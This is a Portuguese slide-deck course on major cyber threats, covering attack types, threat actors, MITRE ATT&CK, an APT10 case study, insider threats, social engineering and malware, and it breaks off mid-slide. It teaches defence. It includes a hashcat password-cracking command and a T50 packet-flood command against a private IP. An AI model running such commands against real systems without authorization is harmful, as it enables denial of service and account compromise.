Você está na página 1de 140

Identificar as principais

ameaças cibernéticas
Aula 1 – Tipos de ataques

Aula 2 – Atores de ameaças

Aula 3 – Engenharia Social

Aula 4 – Malwares
Aula 01

Tipos de ataques
Introdução ao ataques cibernéticos
O que são Ataques Cibernéticos?

Segundo a IBM, podemos considerar como ataque cibernético


qualquer esforço com a intenção de roubar, expor, alterar,
desativar ou destruir dados, aplicativos ou outros ativos
através de acesso não autorizado a redes, sistemas de
computador ou dispositivos digitais.

Fonte: imagem - Freepik.com.


Objetivos

• Roubo de dados confidenciais.

• Interrupção de serviços críticos.

• Espionagem corporativa ou governamental.

• Causar destruição e caos.

• Impacto global significativo.


Fonte: imagem - Freepik.com.
Tipos mais comuns de ataques

Dentre os principais tipos de ataque, atualmente podemos citar


como principais ou mais estudados:

• Phishing.

• Injection.

• Malware.
Fonte: imagem - Freepik.com.

• Engenharia social.

• DDoS.

• Força bruta (Brute Force).

• MiTM.
Importância do tema

Manter-se informado sobre as ameaças é essencial para


mitigar riscos e proteger seus ativos digitais.

• Defesa em profundidade.

• Importância da cooperação e educação.


Fonte: imagem - Freepik.com.

• Reflexão sobre vulnerabilidades pessoais /


organizacionais.
A seguir...

“Se você acha que a tecnologia pode resolver seus


problemas de segurança, então você não entende os
problemas e não entende a tecnologia.”

(Bruce Schneier) Fonte: ícone de Freepik.com. Acesso em 06 de


dezembro de 2023
Engenharia social e Phishing
O que é Phishing

Phishing é um método astuto de engano, mirando suas


informações pessoais ao se passar por entidades confiáveis.
Exploraremos suas formas, como spear-phishing e whaling,
para revelar como esses ataques são construídos para
enganar.

Fonte: Spear pishing disponível https://br.freepik.com/vetores-gratis/ilustracao-de-


phishing-hacker-roubando-um-cartao-de-credito-de-um-aplicativo-
cibercrime_12953617.htm#query=spear%20phishing&position=2&from_view=sear
ch&track=ais&uuid=18db6876-a67a-4afc-9a6b-b54713bd0e14. Acesso em 06 de
dezembro de 2023

https://github.com/gophish/gophish
Como funcionam os ataques de phishing

• Preparação da mensagem convincente.

• Enganar a vítima para executar ações prejudiciais.

• Exemplos de ações: clicar em links maliciosos, fornecer


informações sensíveis.

Fonte: Spear pishing disponível https://br.freepik.com/vetores-gratis/ilustracao-de-


phishing-hacker-roubando-um-cartao-de-credito-de-um-aplicativo-
cibercrime_12953617.htm#query=spear%20phishing&position=2&from_view=sear
ch&track=ais&uuid=18db6876-a67a-4afc-9a6b-b54713bd0e14. Acesso em 06 de
dezembro de 2023
Identificando tentativas de phishing

Identificar tentativas de phishing é um desafio, com sinais


reveladores como erros gramaticais e URLs suspeitas.

Fonte: Spear pishing disponível https://br.freepik.com/vetores-gratis/ilustracao-de-


phishing-hacker-roubando-um-cartao-de-credito-de-um-aplicativo-
cibercrime_12953617.htm#query=spear%20phishing&position=2&from_view=sear
ch&track=ais&uuid=18db6876-a67a-4afc-9a6b-b54713bd0e14. Acesso em 06 de
dezembro de 2023
O que é Engenharia Social

• Utilização da psicologia humana contra nós.

• Enganar pessoas para revelar informações ou realizar


ações comprometedoras.

• Compreensão das táticas para defesa eficaz.

Fonte: Imagem de Flaticon.com.


O que é Engenharia Social

"Engenharia social é qualquer ato que influencia uma pessoa


a tomar uma ação que pode ou não ser em seu melhor
interesse“.

Christopher Hadnagy.

Fonte: Imagem de Flaticon.com.


Prevenção

A melhor defesa é o eterno alerta, a verificação da


autenticidade das solicitações e o uso de tecnologias de
segurança.

• Educação, conscientização e comprometimento como


defesas principais.
• Conhecendo as táticas adversárias para evitar
Fonte: Imagem de Flaticon.com.

armadilhas.
A seguir...

No próximo tópico, vamos caminhar para outros desafios:

• Ataques Man-in-the-Middle.

• Força Bruta (Brute Force).

Fonte: ícone de Freepik.com. Acesso em 06 de


dezembro de 2023
Ataques Man-in-the-Middle e
força bruta
Ataques Man-in-the-Middle (MitM)

Imagine alguém escutando secretamente suas


conversas online. Os ataques MitM fazem
exatamente isso: interceptam comunicações
sem serem percebidos, mostrando a
vulnerabilidade das nossas interações
digitais.

Fonte: Imagem de macrovector_oficial Freepik.com.


Como prevenir ataques MitM

• Utilização de HTTPS para conexões seguras.

• Implementação de VPNs.

• Verificação cuidadosa de certificados digitais.

Fonte: Imagem de macrovector_oficial Freepik.com.


Ataques de Força Bruta (Brute Force)

No mundo dos ataques, a Força Bruta é como tentar abrir um


cofre testando todas as combinações possíveis.

Com a ajuda de softwares, até as senhas mais complexas


estão sob ameaça.

O exemplo abaixo utiliza o dicionário rockyou.txt, para quebra de um hash MD5.

$hashcat -m 0 42f749ade7f9e195bf475f37a44cafcb ../wordlists/rockyou.txt


Fonte: Imagem de macrovector_oficial Freepik.com.
Estratégias de Proteção

• Adoção de autenticação multifator.

• Criação de políticas de senha robustas.

• Fortalecimento das defesas digitais.

Fonte: Imagem de macrovector_oficial Freepik.com.


A importância do tema

Os ataques MitM e Força Bruta sublinham a necessidade de


uma estratégia de segurança digital abrangente, combinando
práticas sólidas, tecnologia avançada e vigilância constante.

Fonte: Imagem de macrovector_oficial Freepik.com.


A seguir...

Nesse tópico, reconhecemos a importância dos pilares da


segurança: Confidencialidade, Integridade e
Disponibilidade.

No próximo tópico, abordaremos a Introdução aos


ataques de negação de serviço (DoS e DDoS). Fonte: ícone de Freepik.com. Acesso em 06 de
dezembro de 2023
Ataques Injections e DDoS
Conceitos – DoS e DDsS

• Diferença entre DoS e DDoS.

• Impacto na disponibilidade de serviços digitais.

• Estratégias de amplificação e distribuição de


ataques.

Fonte: Imagem de macrovector_oficial Freepik.com.


DoS – Denial of Service

Alvo

Pacotes Pacotes Pacotes Pacotes


malformados, malformados, malformados, malformados,
Falsos Falsos Falsos Falsos
endereços IP... endereços IP... endereços IP... endereços IP...

Fonte: Imagem de macrovector_oficial Freepik.com.

Atacante
DDoS – Distributed Denial of Service
Alvo Alvo Alvo Alvo

Dispositivos Dispositivos Dispositivos Dispositivos


zumbis (botnet) zumbis (botnet) zumbis (botnet) zumbis (botnet)
enviam pacotes enviam pacotes enviam pacotes enviam pacotes
malformados, malformados, malformados, malformados,
falsos falsos falsos falsos
endereços IP... endereços IP... endereços IP... endereços IP...

Fonte: Imagem de macrovector_oficial Freepik.com.

Atacante
Cenários de ataques

Algumas histórias marcantes:

• Ataques Mirai (2016).

• Ataque ao GitHub (2018).

Fonte: Imagem de macrovector_oficial Freepik.com.


Mecanismo de ataque

• Técnicas e ferramentas usadas em ataques


DoS/DDoS.

• Como os ataques são orquestrados.

A T50, é uma ferramenta brasileira, injetora de pacotes


multiprotocolo para realização de Testes de Estresse
durante PenTest.
$ t50 192.168.1.1 -–protocol t50 --flood
Fonte: Imagem de macrovector_oficial Freepik.com.

T50 Experimental Mixed Packet Injector Tool v5.8.7b


Originally created by Nelson Brito <nbrito@sekure.org>
Previously maintained by Fernando Mercês <fernando@mentebinaria.com.br>
Maintained by Frederico Lamberti Pissarra <fredericopissarra@gmail.com>

[INFO] PID=14919
[INFO] t50 5.8.7b successfully launched at Tue Jan 12 10:08:56 2024
Impacto e Estratégia de mitigação

• Identificação de Tráfego Malicioso.

• Teste a execução de ataques DoS.

• Balanceamento de Carga.

• Avaliando possíveis danos.

• Criando uma estratégia de backup.

• Planos de Resposta a Incidentes. Fonte: Imagem de macrovector_oficial Freepik.com.


O que é Injection

• Definição e impacto dos ataques de Injection.

• O perigo representado pelo SQL Injection.

• A diversidade dos vetores de ataque de Injection.


OWASP TOP 10

Fonte: Imagem de macrovector_oficial Freepik.com.


Exemplos

• Heartland Payment Systems (2008).

• Sony Pictures (2011).

Evidenciam as consequências devastadoras dos ataques de


Injection e a importância da segurança de aplicações.

Fonte: Imagem de macrovector_oficial Freepik.com.


Prevenção

• Práticas de segurança para prevenir Injection.

• Importância da validação de entrada e consultas


parametrizadas.

• A necessidade de auditorias de segurança frequentes.

Fonte: Imagem de macrovector_oficial Freepik.com.


A seguir

Encerramos nossa exploração sobre Injection e Ataques


DoS/DDoS, enfatizando a importância de defesas robustas.

Nossa próxima parada: Conhecendo os Atores de


Ameaças.

Fonte: ícone de Freepik.com. Acesso em 06 de


dezembro de 2023
Aula 02

Atores de ameaças
Hackers

No contexto de segurança cibernética, são indivíduos, grupos,


organizações ou entidades que representam uma ameaça
potencial aos sistemas de informação, redes e ativos de uma
organização.

Eles têm motivações e intenções que variam amplamente, e


são categorizados em vários tipos com base em suas
características e objetivos.
Fonte: imagem de macrovector_official no Freepik.com

#ficadica
Documentário: Hackers: Criminosos e Anjos
Black Hat & White Hat

Black Hats (Hackers Maliciosos):


• São os antagonistas no mundo digital.
• Buscam explorar vulnerabilidades para fins ilegais.
• Impactos devastadores sobre indivíduos e organizações.

White Hats (Hackers Éticos):


• Utilizam suas habilidades para melhorar a segurança.
• Identificam e corrigem vulnerabilidades. Fonte: imagem de storyset no Freepik.com

• Sua atuação é fundamental para a proteção de sistemas e redes


em todo o mundo.
Atores de ameaça

• Indivíduos ou grupos envolvidos em atividades


cibernéticas maliciosas.

• Identificados por meio de práticas, técnicas e objetivos


comuns na comunidade de segurança cibernética.

• Podem ser rastreados e classificados com base em


metodologias analíticas específicas.

• Conhecidos por diversos nomes, como grupos de Fonte: imagem de Macrovector no Freepik.com

ameaças, grupos de atividades ou simplesmente grupos,


dependendo da organização que realiza o rastreamento.
MITRE ATT&CK

• Diretrizes para classificar e descrever ataques


cibernéticos e invasões.

• Grupos são clusters de atividades rastreados por um


nome comum na comunidade de segurança.

• A equipe MITRE ATT&CK usa o termo Grupo para se


referir a qualquer uma das designações acima para um
cluster de atividade adversária. Fonte: imagem de Macrovector no Freepik.com
MITRE ATT&CK

• Táticas, Técnicas e Procedimentos (TTPs).

• Grupos de Ameaças.

• Software e Ferramentas.

• Campanhas Atribuídas.

• Mapeamento de Técnicas para Mitigações.

• Referências de Código Aberto. Fonte: imagem de Macrovector no Freepik.com

https://attack.mitre.org/groups/
A seguir...

No próximo tópico, vamos:

• Explorar motivações

• Estrutura Mitre ATT&CK

• Introdução às Ameaças Persistentes Avançadas (APTs)


Fonte: ícone de Freepik.com. Acesso em 06 de
dezembro de 2023
Uma Jornada através da Estrutura
MITRE ATTACK
Introdução às Ameaças
Persistentes Avançadas (APTs)

Definição de APTs:

• Ataques cibernéticos complexos e sofisticados.

• Realizados por atores estatais ou organizações criminosas bem


financiadas.

• Utilizam a estrutura MITRE ATT&CK para execução e análise. Fonte: imagem de macrovector official no Freepik.com
E1 - Reconhecimento

• Objetivo: Coletar informações sobre a organização-alvo.

• Técnicas utilizadas: Engenharia social, OSINT, varredura de rede.

• Exemplos de técnicas: Spearphishing, verificação de portas,


mapeamento de rede.
Fonte: imagem de macrovector official no Freepik.com
E2 – Acesso inicial

• Objetivo: Obter acesso à rede da organização-alvo.

• Técnicas utilizadas: Exploração de vulnerabilidades, ataques de


senha, comprometimento de software de terceiros.

• Exemplos de técnicas: Explorando vulnerabilidades, ataques de


força bruta/pulverização de senha, ataques à cadeia de suprimentos.
Fonte: imagem de macrovector official no Freepik.com
E3 – Comando e Controle C2

• Objetivo: Estabelecer um canal de comando e controle para


comunicação e controle dos sistemas comprometidos.

• Técnicas utilizadas: Instalação de Trojans de acesso remoto, uso de


algoritmos de geração de domínio, canais secretos.

• Exemplos de técnicas: RATs, DGAs, comunicação via DNS ou HTTP.


Fonte: imagem de macrovector official no Freepik.com
E4 – Movimento lateral

• Objetivo: Mover-se lateralmente pela rede para comprometer sistemas


adicionais e obter acesso a dados confidenciais.

• Técnicas utilizadas: Pass-the-Hash, exploração de serviços mal


configurados, ataques de força bruta.

• Exemplos de técnicas: Uso de credenciais roubadas, exploração de


Fonte: imagem de macrovector official no Freepik.com

vulnerabilidades em serviços/aplicações, ataques de força bruta para


acesso a sistemas adicionais.
E5 – Exfiltração de dados

• Objetivo: Extrair dados confidenciais da organização-alvo.

• Técnicas utilizadas: Esteganografia, criptografia, exfiltração através


de canais C2.

• Exemplos de técnicas: Ocultação de dados em arquivos legítimos,


criptografar dados para evitar detecção, uso de canais C2 para
Fonte: imagem de macrovector official no Freepik.com

exfiltrar dados.
Desafios e Impactos das APTs

• O impacto significativo das APTs nas organizações, incluindo perda


financeira e de reputação.

• Estratégias de mitigação, conscientização de segurança, atualização


e patch de sistemas, defesa em profundidade.

• A importância da colaboração e compartilhamento de informações


Fonte: imagem de macrovector official no Freepik.com

para combater APTs.


A seguir...

Nesse tópico, investigamos os atores de ameaças e exploramos os


detalhes do MITRE ATT&CK.

No próximo tópico, vamos conhecer as Ameaças Persistentes


Avançadas:

• Aprofundamento das Ameaças Persistentes Avançadas. Fonte: ícone de Freepik.com. Acesso em 06 de


dezembro de 2023

• MITRE ATT&CK como guia.

• Como os atores operam.

• Estratégias de defesa.
Estudo de caso – APTO10
Introdução ao Ataque APT10 – Stone Panda

• Relevância do grupo no cenário global de cibersegurança.

• Como a MITRE ATT&CK ajuda as organizações a compreender


e combater APTs.

• Os diferentes estágios do ataque APT utilizado pelo APT10.


Fonte: AdobeStock

• A importância de entender as táticas e técnicas do APT10.

• Estratégias para desenvolver defesas mais eficazes contra


ataques APT, utilizando a estrutura MITRE ATT&CK.

https://attack.mitre.org/
E1 - Reconhecimento

• Ataque Inicial do APT10 (2017).

• Grupos visados: Empresas dos EUA nos setores aeroespacial,


de telecomunicações e tecnologia.

• Técnicas de Reconhecimento Utilizadas: Envio de e-mails com


anexos maliciosos.
Fonte: AdobeStock

• Objetivo: Instalar backdoors nos computadores das vítimas.

• Inteligência de Código Aberto: Coleta de informações detalhadas


sobre as empresas-alvo e suas redes.
E2 – Acesso Inicial

• Estabelecimento do Acesso Inicial


• Instalação de backdoor nos sistemas das vítimas.
• Uso de credenciais roubadas para acessar a rede.
• Movimento Lateral na Rede
• Aplicação de técnicas para se mover lateralmente pela rede
alvo. Fonte: AdobeStock

• Técnica "Pass the Ticket“ (AD)


• Descrição: Método utilizado para burlar os mecanismos de
autenticação sem a necessidade de senha.
• Objetivo: Acessar contas e sistemas restritos dentro da rede
alvo.
E3 - Comando e Controle | C2

• Estabelecimento de Canal C2
• Uso do RAT (Remote Access Trojan) chamado RedLeaves
para criar um canal de comando e controle.
• Funções do Canal C2
• Emissão de comandos remotos aos sistemas
comprometidos. Fonte: AdobeStock

• Exfiltração de dados sensíveis das organizações atacadas.


• Impacto do Comando e Controle
• Acesso contínuo e não autorizado aos sistemas
comprometidos.
• Risco significativo de vazamento de informações
confidenciais.
E4 - Movimento Lateral

• Técnicas de Movimento Lateral


• Passar o Hash: Utilização de hashes de autenticação para
acessar outros sistemas sem a necessidade das senhas
originais.
• Exploração de Vulnerabilidades: Aproveitamento de falhas
de segurança em softwares para ganhar acesso a sistemas
adicionais. Fonte: AdobeStock

• Roubo de Credenciais: Uso de técnicas para obter nomes de


usuário e senhas legítimas.
• Uso de Ferramentas para Coleta de Credenciais
• Mimikatz: Ferramenta utilizada para extrair credenciais da
memória de sistemas operacionais.
• Objetivo do Movimento Lateral
• Ampliação do acesso dentro da rede alvo.
E5 - Exfiltração de Dados

• Métodos de Exfiltração de Dados


• Uso de malware personalizado para coletar e transmitir
dados.
• Aplicação de serviços legítimos de compartilhamento de
arquivos, como o Dropbox, para disfarçar o tráfego
malicioso.
Fonte: AdobeStock

• Objetivos da Exfiltração
• Roubo de informações sensíveis e propriedade intelectual.
• Acessar dados críticos para fins de espionagem ou
vantagem competitiva.
• Desafios para a Segurança
• Dificuldade em detectar a exfiltração devido ao uso de
ferramentas legítimas.
Conclusão e Defesa contra APTs

• APTs são ataques cibernéticos complexos e sofisticados com


múltiplos estágios.

• Objetivam infiltrar redes e extrair dados de forma discreta e


persistente.

• MITRE ATT&CK fornece uma visão abrangente e estruturada das


Fonte: AdobeStock

táticas e técnicas de APT.

• Ajuda organizações a desenvolverem estratégias de defesa


informadas.

• Cada estágio tem objetivos específicos dentro do ataque geral.


A seguir...

No próximo tópico, abordamos as Ameaças Internas:

• Funcionários, contratados ou parceiros com acesso


privilegiado podem se tornar fontes de ameaças.

• Discutiremos estratégias eficazes para mitigar esses riscos


com base no framework MITRE ATT&CK. Fonte: ícone de Freepik.com. Acesso em 06 de
dezembro de 2023

Prepare-se para aprofundar seu entendimento sobre como proteger


sua organização.
Ameaças internas
Ameaças internas

• Ameaças Internas:

• Funcionários, contratados ou parceiros com acesso


privilegiado podem se tornar fontes de ameaças.

• Discutiremos estratégias eficazes para mitigar esses riscos


com base no framework MITRE ATT&CK. Fonte: ícone de Freepik.com. Acesso em 06 de
dezembro de 2023

• Prepare-se para aprofundar seu entendimento sobre como


proteger sua organização.
Estudo de Caso

• Contexto da ameaça:
• Incidente envolvendo um funcionário insatisfeito em uma
grande corporação tecnológica.
• Sabotagem de operações e comprometimento de
informações confidenciais.
• Métodos utilizados: Fonte: ícone de Freepik.com. Acesso em 06 de

• Uso de credenciais de acesso: Acesso indevido a


dezembro de 2023

informações sensíveis armazenadas em nuvem.


• Modificação de dados: Adulteração de informações críticas.
• Exfiltração de dados: Transferência de dados confidenciais
para terceiros.
• Impactos potenciais:
• Risco à propriedade intelectual e à reputação da empresa.
• Prejuízo à competitividade no mercado.
Estudo de Caso

• Operação de Sabotagem:

• Utilização de manipulação de dispositivo de campo e


interferência no processo.

• Alteração do comportamento de dispositivos críticos e


interrupção de processos de produção. Fonte: ícone de Freepik.com. Acesso em 06 de
dezembro de 2023
Estudo de Caso

• Consequências da sabotagem:

• Interrupções significativas nas operações de produção.

• Potencial dano a equipamentos de manufatura.

• Prejuízos financeiros imensuráveis.

• Perda de confiança dos stakeholders na segurança


Fonte: ícone de Freepik.com. Acesso em 06 de
dezembro de 2023

operacional.

• Impactos abrangentes:

• Perda direta de propriedade intelectual até atrasos


prolongados na linha de produção. Efeito cascata sobre a
reputação e a competitividade da empresa no mercado.
Técnicas utilizadas

1. Manipulação de Contas (Account Manipulation).

2. Comando e Controle (Command and Control).

3. Evasão de Detecção (Defense Evasion).

4. Exfiltração (Exfiltration).
Fonte: AdobeStock
Monitoramento

• Abordagem multifacetada contra ameaças internas.

• Integração com o MITRE ATT&CK.

• Utilização do framework para compreender explorações


internas potenciais.

• Identificação e mitigação de vulnerabilidades específicas do Fonte: AdobeStock

sistema.

• Benefícios do monitoramento de comportamento anormal.

• Preparação contra comportamentos adversários.


A seguir...

Nesse tópico, abordamos as Ameaças Internas:

• Funcionários, contratados ou parceiros com acesso


privilegiado podem se tornar fontes de ameaças.

• Discutiremos estratégias eficazes para mitigar esses riscos


com base no framework MITRE ATT&CK. Fonte: ícone de Freepik.com. Acesso em 06 de
dezembro de 2023

• Prepare-se para aprofundar seu entendimento sobre como


proteger sua organização.

Nosso próximo assunto será Engenharia social.


Aula 03

Engenharia social
Introdução a Engenharia Social
Engenharia Social

"Engenharia social é qualquer ato que influencia uma pessoa a tomar


uma ação que pode ou não ser em seu melhor interesse“.

Christopher Hadnagy.

“A engenharia social, no contexto de segurança da informação,


refere-se à manipulação psicológica de pessoas para a execução de
Fonte: Conceito engenharia Social. Disponível em
https://as1.ftcdn.net/v2/jpg/01/83/33/78/1000_F_183337827_UqL2wIab5y
xh3r7Iysxd7RtnnbHph4H1.jpg. Acesso em 05 de dezembro de 2023

ações ou para a divulgação de informações confidenciais.” (Wikipedia)

“A Engenharia Social é uma técnica de manipulação que explora erros


humanos.” (Kaspersky)
Tipos de Engenharia Social

Algumas manifestações da Engenharia Social:

• Phishing.

• Pretexting.
Fonte: Email pishing. Disponível em

• Baiting. https://as1.ftcdn.net/v2/jpg/04/74/33/90/1000_F_474339043_QzXUc0
C7swuLQE0X4odISvMDsCC6Mscl.jpg. Acesso em 05 de dezembro
de 2023

• Ataque Evil Twin.


Métodos de engajamento

• E-mails falsos: E-mails meticulosamente desenhados para enganar


os destinatários.

• Manipulação online: Utilização de redes sociais para atacar, por


meio de perfis falsificados ou mensagens diretas.
Fonte: o Autor
Engajamento & Conscientização

• Conhecimento das táticas

• Sempre realizar a verificação da autenticidade

• Atitude atenta mitiga os riscos de manipulação e fraude.

• O conhecimento como primeiro passo para a prevenção.


Fonte: worm virus. Disponível em https://www.flaticon.com/br/icone-
gratis/phishing_4576426?term=phishing&related_id=4576426.
Acesso em 05 de dezembro de 2023
A seguir...

Nesse conteúdo, abordamos a Engenharia Social e suas técnicas


que exploram a natureza humana para acesso a informações
valiosas.

No próximo tópico, abordaremos:

• Aprofundamento em técnicas sofisticadas e direcionadas. Fonte: ícone de Freepik.com. Acesso em 06 de


dezembro de 2023

• Foco no Spear Phishing e EvilPortals

A vigilância constante é essencial.


Técnicas de Phishing e EvilTwin
Ataque Evil Twin

O ataque Evil Twin é um exemplo perfeito de como a confiança em


redes Wi-Fi públicas pode ser explorada. Imagine atacantes
tecnicamente habilidosos criando redes Wi-Fi fantasma, disfarçadas
perfeitamente como conexões legítimas em seus locais favoritos,
esperando capturar suas informações mais sensíveis. Fonte: ícone de Freepik.com. Acesso em 06 de
dezembro de 2023

• Exploração da confiança em redes Wi-Fi públicas.

• Atacantes habilidosos imitando conexões legítimas em


locais populares.

• Captura de informações sensíveis.


Construindo o ataque

• Seleção do alvo e do local: O atacante identifica locais ideais onde a


probabilidade de conexão do alvo é alta.

• Criação de um ponto de acesso falso: Com ferramentas simples, cria-


se uma rede que parece legítima, mas é uma armadilha para
interceptar dados. Fonte: Phishing. Disponível em <a <https://www.flaticon.com/br/icone-
gratis/phishing_4616197?term=phishing&page=1&position=3&origin=sea
rch&related_id=4616197>. Acesso em 05 de dezembro de 2023

• Elaborar páginas de login falsas (captive portals) que imitam as


páginas de login reconhecidas pelo alvo.

• Induzir o alvo à conexão, por meio de um QR-Code (QRLJacking) que


aparenta ser de uma rede Wi-Fi legítima. Esse QR-Code pode ser
impresso em um cartaz ou adesivo, exibido em um site ou enviado
por e-mail.
Coleta de Dados

• Acesso irrestrito do atacante ao tráfego de dados.

• Captura de informações confidenciais.

• Distribuição de malware e ataques secundários.

• Aumento significativo do impacto negativo devido à exploração


Fonte: Vishing. Disponível em <a <https://www.flaticon.com/br/icone-
gratis/phishing_4616197?term=phishing&page=1&position=3&origin=sea
avançada. rch&related_id=4616197>. Acesso em 05 de dezembro de 2023
Refinamento – QRLJacking

• Phishing: Lança uma rede ampla, esperando capturar qualquer


coisa.

• Spear Phishing: Estratégia de arpão preciso, visando indivíduos ou


organizações específicas.

• Ataques meticulosamente coletados. Fonte: OWASP (https://owasp.org/www-


community/attacks/Qrljacking) acesso em 13/03/2024

• Investimento de tempo na pesquisa de alvos em redes sociais


e websites corporativos.

• Ataques Evil Twin podem ser mixados para amplificar o resultado.

https://owasp.org/www-community/attacks/Qrljacking
A seguir...

Nesse tópico, abordamos:

• Simulação de ataques de phishing.

• Conscientização do usuário.

• Ataques Evil Twin durante um PenTest

• Ao demonstrar como os ataques funcionam, os


Fonte: ícone de Freepik.com. Acesso em 06 de
dezembro de 2023

profissionais de segurança podem educar os usuários sobre


os riscos.

No próximo tópico, abordaremos o Baiting e Pretexting, que


envolvem a criação de cenários fictícios para enganar as pessoas e
obter informações confidenciais.
Baiting e Pretexting
O que é Baiting

• Técnica de Engenharia Social similar ao Cavalo de Troia.

• Método: Oferece recompensas atraentes (software gratuito, filmes,


acesso exclusivo) para seduzir vítimas.

• Risco: Ofertas tentadoras podem levar à instalação de malware,


divulgação de informações pessoais ou comprometimento da
Fonte: Bait. Disponível em <https://www.flaticon.com/br/icone-
gratis/isca_4634475?term=isca&related_id=4634475>. Acesso em 05 de
dezembro de 2023

segurança.

• Precaução: Importância da conscientização sobre táticas e cautela


com ofertas físicas ou online.
Exemplos de Baiting

• Uso de dispositivos USB infectados, como o Rubber Ducky, em


estratégias de Baiting.

• Cenário: Dispositivos USB, disfarçados de pendrives comuns, são


deixados em locais de alta circulação.

• Rubber Ducky: Ferramenta de pentesting que simula um teclado e


Fonte: o Autor

executa comandos pré-programados quando conectado a um


computador.

• Potencial prejudicial: Dispositivos carregam riscos significativos,


podendo instalar malware ou executar ações maliciosas
automaticamente.
Baiting & Ducky

• Ducky, ao conectar, executa scripts mal-intencionados, sem expor


arquivos.

• Ações maléficas em segundos:

• Roubo de credenciais: Extrai login, senhas, e dados sensíveis.

• Instalação de backdoors: Cria brechas para acessos futuros


Fonte: o Autor

não autorizados.

• Comprometimento da segurança: Conexão inadvertida pode


comprometer a segurança do sistema e da rede.

• A tendência à curiosidade pode levar à conexão de dispositivos


desconhecidos, destacando a importância da conscientização.
O que é Pretexting

• Técnica de engenharia social baseada na criação de histórias


convincentes.

• Enganar vítimas para revelarem informações sensíveis ou


concederem acesso não autorizado.

• Atacantes se passam por entidades confiáveis, adotando


Fonte: Conversa. Disponível em <https://www.flaticon.com/br/icone-
gratis/pacientes_6260326?term=conversa&page=1&position=12&origin=
search&related_id=6260326>. Acesso em 05 de dezembro de 2023

identidades falsas ou autoridades inexistentes.

• Usa a tendência natural das pessoas em confiar em figuras de


autoridade ou conhecidas.

• Visa a manipulação de indivíduos para fins maliciosos através da


confiança
Aspectos do Pretexting

• Narrativa enganosa.

• Identidade falsa.

• Objetivos diversificados.

• Cenários comuns de Pretexting:


Fonte: Conversa. Disponível em <https://www.flaticon.com/br/icone-
gratis/pacientes_6260326?term=conversa&page=1&position=12&origin=

• Atualizações de senha.
search&related_id=6260326>. Acesso em 05 de dezembro de 2023

• Emergências fabricadas.

• Personificação de autoridades.
Evitando Baiting e Pretexting

• Desconfiança saudável.

• Verificação de fontes.

• Educação e treinamento.

• Políticas de Segurança.
Fonte: Conceito engenharia Social. Disponível em
https://as1.ftcdn.net/v2/jpg/06/17/46/30/1000_F_617463050_MaIqbjI9I30m637HuUaCb00BSE8AQZ

• Autenticação multifator (MFA).


Jc.jpg. Acesso em 05 de dezembro de 2023
A seguir...

Nesse tópico, abordamos:

• Baiting e Pretexting exploram confiança e curiosidade.

• Conscientização e conhecimento: Principais defesas

• Implementação de políticas de segurança robustas


Fonte: ícone de Freepik.com. Acesso em 06 de
• Desenvolvimento de vigilância comportamental aguçada dezembro de 2023

No próximo tópico, abordaremos as estratégias de defesa contra


engenharia social.
Defesa Contra Engenharia Social
Educação de Indivíduos

• Conhecimento como defesa contra engenharia social:

• Importância das simulações de phishing, baiting...

• Manter exercícios práticos para preparo efetivo.

• Educação contínua amplia a consciência sobre segurança e


reforça práticas seguras no cotidiano.
Fonte: ícone de Freepik.com. Acesso em 06
de dezembro de 2023

• Conexão com a Comunidade:

• A excelência do conhecimento.

• Oportunidades através da rede de contatos.


Ferramentas de Segurança Cibernética

• Essencial complementar a educação com ferramentas de


segurança.

• Defina uma diversidade de soluções:

• Soluções antiphishing.
Fonte: ícone de Freepik.com. Acesso em 06 de
dezembro de 2023
• Firewalls.

• Sistemas de detecção de intrusão.

• Software de segurança para endpoints.

• Tecnologias ajudam a formar uma defesa sólida.

• Mantenha a prevenção proativa.


Políticas de Segurança Fortes

• Desenvolvimento e manutenção de Políticas de Segurança.

• Politicas claras e abrangentes como base para responsabilidade


coletiva.

• Adesão a frameworks e normas (estado da arte):


Fonte: o Autor

• ISO 27001, CIS, NIST entre outros.

• Diretrizes para comportamentos e procedimentos seguros:

• Delineamento de comportamentos esperados.

• Procedimentos para notificação de incidentes.

• Cultura organizacional focada em segurança.


Simulações de Ataque de Phishing

• Simulações de Phishing:

• Avaliação da prontidão dos funcionários e eficiência dos


programas de treinamento.

• Identificação de vulnerabilidades, permite ajustes estratégicos na


defesa.
Fonte: ícone de Freepik.com. Acesso em 06
de dezembro de 2023

• Ampla gama de ferramentas de teste (proprietárias e open-source):

• Recursos de software e hardware disponíveis.

• Aprimoramento contínuo.

Blog: Phishing Tools


Gestão de Incidentes de Segurança

• Importância de um Plano de Resposta a Incidentes detalhado e


eficaz para preparação contra incidentes inesperados.

• Personalização e abrangência do plano:

• Evitar abordagens genéricas ("copia e cola").

• Inclusão de protocolos para ataques de Engenharia Social.


Fonte: ícone de Freepik.com. Acesso em 06
de dezembro de 2023

• Objetivos do plano: minimizar danos e garantir recuperação ágil e


eficiente.

• Uma corrida constante, preparação como chave para enfrentar


desafios.
Revisão de Acesso e Privilégios

• Princípio do menor privilégio como estratégia de mitigação.

• Restrição de acesso como tática de segurança.

• Acesso limitado diminui chances de ataques.

• Adoção do conceito de Zero Trust. Importância de entender e


Fonte: ícone de Freepik.com. Acesso em 06
de dezembro de 2023
explorar esse paradigma.

• Necessidade de abordagem cuidadosa à confiança.


Conclusão

Nesse conteúdo, reconhecemos a importância de permanecer alerta


e preparado.

No próximo tópico, abordaremos os Malwares:


Fonte: ícone de Freepik.com. Acesso em 06 de

• Exploração de vírus a ransomware. dezembro de 2023

• Mecânica e métodos de ataque de malwares.


Aula 04

Malwares
Tipos de Malwares
Tipos de malware

Malware, abreviação de “malicious software”, refere-se a


qualquer programa projetado para causar danos.

Várias formas:
1. Vírus:
2. Worms Fonte: Malwares em
<https://as2.ftcdn.net/v2/jpg/04/63/54/27/1000_F_463542729_pTBUhiQcD
cpJiB1O1xgH9kk4rk2lcS5X.jpg> Acesso em 07 de dezembro de 2023

3. Trojans
4. Ransomware
5. Bots

Objetivo Comum

• Comprometimento da segurança digital


Worm e Trojan

• Worms são ameaças cibernéticas que se destacam pela


capacidade de auto-replicação e disseminação por redes,
infectando numerosos sistemas sem necessitar de qualquer
interação direta com o usuário.
• Conficker, ILOVEYOU, Nimda
Fonte: https://br.freepik.com.
Acesso em 08 de dezembro de 2023

• Trojans são malwares disfarçados de software legítimo,


enganando os usuários para que os instalem e executem,
desencadeando assim suas cargas maliciosas.
• Zeus, DarkComet, Blackshades
Ransomware | Keyloggers

• Ransomware é uma forma de malware que criptografa os dados


pessoais do usuário, bloqueando o acesso até que um resgate
seja pago.

• Os keyloggers operam discretamente, monitorando e registrando Fonte: o Autor

cada pressionamento de tecla feito pelo usuário, com o objetivo de


